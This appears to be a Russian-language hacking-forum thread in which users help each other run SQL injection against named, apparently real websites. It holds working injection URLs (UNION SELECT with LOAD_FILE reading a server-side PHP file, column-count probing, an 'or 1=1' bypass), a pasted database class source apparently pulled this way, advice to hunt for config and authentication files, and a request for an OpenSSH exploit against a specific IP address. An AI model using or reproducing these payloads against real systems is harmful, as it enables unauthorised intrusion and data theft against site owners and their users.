ошибся ты в том, что тут возможен бы был локальный инклюд, если бы не было экранирования спец символов типа кавычки и нуля, причем как я понял там еще и фильтрация какая то написана, хотя насчет фильтрации хз, но экранирование не дает провести локальный инклюд
Подскажите пожалуйста, есть какая нибудь прога для подстановки чисел в SQL инъекций, ну а точнее ВОТ прочитал я эту статью, и там написано Ну вот есть прога для атоматической подстановки чисел?) Я много раз читал эту статью, токо вот с подстановкой не выходит, ) Вручную чтоли делать?) А эти шаблоны уже заепали) и вправду самому надо думать, а не готовыми инъекциями) Ну вот такой у меня вопрос, может не внимательно я смотрел на ачате, может есть такая прога?)
http://topofgames.com/index.php?cat_id=72' Подставил какое-то значение не помню,вывело ашиппку.Стоит фильтрация на кавычку.Вместо неё куча обратных слешей:РР http://www.dotfiles.com/index.php?cat_id=-6+order+by+1/* Дыра есь,но как обойти хз:РР
http://www.nlstar.com/catalog/index.php?cat_id=17'+union+select+1,2,LOAD_FILE('/var/www/vhosts/nlstar.net/req/class.db.php')+from+mysql.user/* код выпадет в исходник всегда смотри file_priv, дальше советую поискать какие нибудь конфиги или исходники авторизации
шотто я ниче не вижу....там где написано Каталог Продукции Nl есь какой-то кусок кода,и усё:Р Можно чутка поподробней? А то я нуп Ж(
есть сайт с инекцией http://wgem.com/Community/event.php?ID=5014' если через group by подбирать колличество то получается 8 http://wgem.com/Community/event.php?ID=5014+group+by+8 А когда начинаю писать http://wgem.com/Community/event.php?ID=5014+union+select+1,2,3,4,5,6,7,8/* выдает что их не 8... что не так?
m0use кури more than 1 row от Elekt'а , там реально все сделать. Ветка там 4, таблица users, колонки: id,username,password
да, можно конечно, но это сложнее для понимания чем например http://wgem.com/Community/event.php?ID=-5014/**/or/**/1=1/*
class DBMysql { var $Connected; var $Connection; function DBMysql($connection_string) { $this->Connected = FALSE; $pattern = '/^([\w\d]+)[^\s]*)@([.\w\d]+);([\w\d]+)$/'; $matches = array(); if ( preg_match($pattern, $connection_string, $matches) != 0 ) { array_shift($matches); list($username, $password, $host, $database) = $matches; if ( $c = @mysql_connect($host, $username, $password) ) { if ( @mysql_select_db($database, $c) ) { $this->Connected = TRUE; $this->Connection = $c; $this->Query("SET NAMES cp1251"); } } } return($this->Connected); } function Close() { @mysql_close($this->Connection); $this->Connected = FALSE; } function Query($query) { $args = func_get_args(); if ( sizeof($args)-1 != substr_count($query, '?') ) trigger_error('Wrong arguments count<br>' . $query, E_USER_ERROR); $sql = ""; $q = 1; while ( ($pos = strpos($query, '?')) !== FALSE ) { $l = $query[$pos-1]; $r = $query[$pos+1]; if ( $l == $r ) { switch ($l) { case '"': $args[$q] = str_replace('"', '\"', $args[$q]); break; case '\'': $args[$q] = str_replace('\'', '\\\'', $args[$q]); break; case '`': $args[$q] = preg_replace('/[^a-zA-Z0-9_]/', '' , $args[$q]); break; } } else if ( !is_numeric($args[$q]) ) $args[$q] = '\'' . str_replace('\'', '\\\'', $args[$q]) . '\''; $sql .= substr($query, 0, $pos) . $args[$q]; $query = substr($query, $pos+1, strlen($query)-$pos); $q++; } $sql .= $query; // echo $sql . '<hr>'; $result = mysql_query($sql, $this->Connection) or trigger_error('<b>Ошибка SQL запроса:</b> ' . $sql . '<br />' . mysql_error(), E_USER_ERROR); return($result); } function Fetch($result) { $row = @mysql_fetch_array($result); return($row); } function FetchQuery($query) { $args = func_get_args(); $result = call_user_func_array(array(&$this, 'Query'), $args); $row = $this->Fetch($result); return($row); } function FetchAll($result) { $r = array(); while ( $row = $this->Fetch($result) ) $r[] = $row; return($r); } function NumRows($result) { $n = @mysql_num_rows($result); return($n); } function IsEmpty($result) { $result = ( $this->NumRows($result) == 0 ) ? TRUE : FALSE; return($result); } function LastInsertID() { return(mysql_insert_id($this->Connection)); } } $dbtable = array(); foreach (explode(',', $tablenames) as $tablename) { $tablename = trim($tablename); $dbtable[$tablename] = $db_prefix . $tablename; } $db = new DBMysql($DB_CONNECTION_STRING); ?> Просмотрел,поискал,не понял:Р Что там должно быть такое,что меня так сильно интересует )))))
плиз, подскажите, есть для этого SSH-1.99-OpenSSH_3.9p1 сплойт сервак висит под этим ip 65.98.230.4 http://forum.antichat.ru/showpost.php?p=591791&postcount=4841
kair http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=OpenSSH+3.9p1&x=0&y=0 http://search.securityfocus.com/swsearch?query=SSH+1.99&sbm=%2F&submit=Search%21&metaname=alldoc&sort=swishrank Ох не знал я, что поисковики отменили.
